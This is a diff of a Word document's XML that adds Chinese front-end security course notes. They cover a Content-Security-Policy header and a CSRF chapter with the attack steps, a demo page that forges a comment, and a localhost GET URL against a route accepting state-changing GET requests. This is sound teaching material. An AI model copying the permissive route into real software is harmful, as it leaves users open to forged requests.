+          <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
+          <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
+          <w:right w:w="108" w:type="dxa"/>
+        </w:tblCellMar>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="8522"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblLayout w:type="fixed"/>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="108" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
             <w:right w:w="108" w:type="dxa"/>
           </w:tblCellMar>
         </w:tblPrEx>
@@ -2971,7 +2987,9 @@
         </w:tblBorders>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
           <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
           <w:right w:w="108" w:type="dxa"/>
         </w:tblCellMar>
       </w:tblPr>
@@ -2990,7 +3008,9 @@
           </w:tblBorders>
           <w:tblLayout w:type="fixed"/>
           <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
             <w:left w:w="108" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
             <w:right w:w="108" w:type="dxa"/>
           </w:tblCellMar>
         </w:tblPrEx>
@@ -3254,7 +3274,9 @@
         </w:tblBorders>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
           <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
           <w:right w:w="108" w:type="dxa"/>
         </w:tblCellMar>
       </w:tblPr>
@@ -3273,7 +3295,9 @@
           </w:tblBorders>
           <w:tblLayout w:type="fixed"/>
           <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
             <w:left w:w="108" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
             <w:right w:w="108" w:type="dxa"/>
           </w:tblCellMar>
         </w:tblPrEx>
@@ -3940,7 +3964,9 @@
         </w:tblBorders>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
           <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
           <w:right w:w="108" w:type="dxa"/>
         </w:tblCellMar>
       </w:tblPr>
@@ -3959,7 +3985,9 @@
           </w:tblBorders>
           <w:tblLayout w:type="fixed"/>
           <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
             <w:left w:w="108" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
             <w:right w:w="108" w:type="dxa"/>
           </w:tblCellMar>
         </w:tblPrEx>
@@ -4529,7 +4557,9 @@
         </w:tblBorders>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
           <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
           <w:right w:w="108" w:type="dxa"/>
         </w:tblCellMar>
       </w:tblPr>
@@ -4548,7 +4578,9 @@
           </w:tblBorders>
           <w:tblLayout w:type="fixed"/>
           <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
             <w:left w:w="108" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
             <w:right w:w="108" w:type="dxa"/>
           </w:tblCellMar>
         </w:tblPrEx>
@@ -6146,7 +6178,9 @@
         </w:tblBorders>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
           <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
           <w:right w:w="108" w:type="dxa"/>
         </w:tblCellMar>
       </w:tblPr>
@@ -6165,7 +6199,9 @@
           </w:tblBorders>
           <w:tblLayout w:type="fixed"/>
           <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
             <w:left w:w="108" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
             <w:right w:w="108" w:type="dxa"/>
           </w:tblCellMar>
         </w:tblPrEx>
@@ -9436,7 +9472,9 @@
         </w:tblBorders>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
           <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
           <w:right w:w="108" w:type="dxa"/>
         </w:tblCellMar>
       </w:tblPr>
@@ -9455,7 +9493,9 @@
           </w:tblBorders>
           <w:tblLayout w:type="fixed"/>
           <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
             <w:left w:w="108" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
             <w:right w:w="108" w:type="dxa"/>
           </w:tblCellMar>
         </w:tblPrEx>
@@ -9615,7 +9655,9 @@
         </w:tblBorders>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
           <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
           <w:right w:w="108" w:type="dxa"/>
         </w:tblCellMar>
       </w:tblPr>
@@ -9634,7 +9676,9 @@
           </w:tblBorders>
           <w:tblLayout w:type="fixed"/>
           <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
             <w:left w:w="108" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
             <w:right w:w="108" w:type="dxa"/>
           </w:tblCellMar>
         </w:tblPrEx>
@@ -11335,6 +11379,1464 @@
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
         <w:fldChar w:fldCharType="end"/>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="8"/>
+        <w:tblW w:w="8522" w:type="dxa"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
+          <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
+          <w:right w:w="108" w:type="dxa"/>
+        </w:tblCellMar>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="8522"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblLayout w:type="fixed"/>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="108" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="108" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="8522" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ctx.set(`Content-Security-Policy`, `default-src 'self'`);</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>inline-script脚本将不执行，只要同源才能够允许访问</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Refused to execute inline script because it violates the following Content Security Policy directive: "default-src 'self' </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> HYPERLINK "http://security-imooc.toobug.net\"." </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="12"/>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>http://security-imooc.toobug.net".</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>第04章 前端CSRF</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>*Cross Site Request Forgy</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>*跨站请求伪造</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:bidi w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>4.1 CSRF攻击原理：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+            <wp:extent cx="3208020" cy="1693545"/>
+            <wp:effectExtent l="0" t="0" r="11430" b="1905"/>
+            <wp:docPr id="1" name="图片 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name="图片 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3208020" cy="1693545"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>用户登录A网站；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>A网站确认身份；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>B网站页面向A网站发起请求；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>4.2 小试牛刀</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>登录后评论.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>打开other/csrf.html</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>发现评论多了一条来自CSRF的记录。</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="8"/>
+        <w:tblW w:w="8522" w:type="dxa"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
+          <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
+          <w:right w:w="108" w:type="dxa"/>
+        </w:tblCellMar>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="8522"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblLayout w:type="fixed"/>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="8522" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>router.get('/ajax/addComment', site.addComment);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>var data;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>if(ctx.request.method === 'post'){</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>data = ctx.request.body;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>} else {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>data = ctx.request.query;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+            <wp:extent cx="5274310" cy="1383665"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
+            <wp:docPr id="5" name="图片 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="5" name="图片 5"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="1383665"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> HYPERLINK "http://localhost:1521/ajax/addComment?postId=1&amp;content=这是来自get请求的评论" </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="12"/>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>http://localhost:1521/ajax/addComment?postId=1&amp;content=这是来自get请求的评论</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
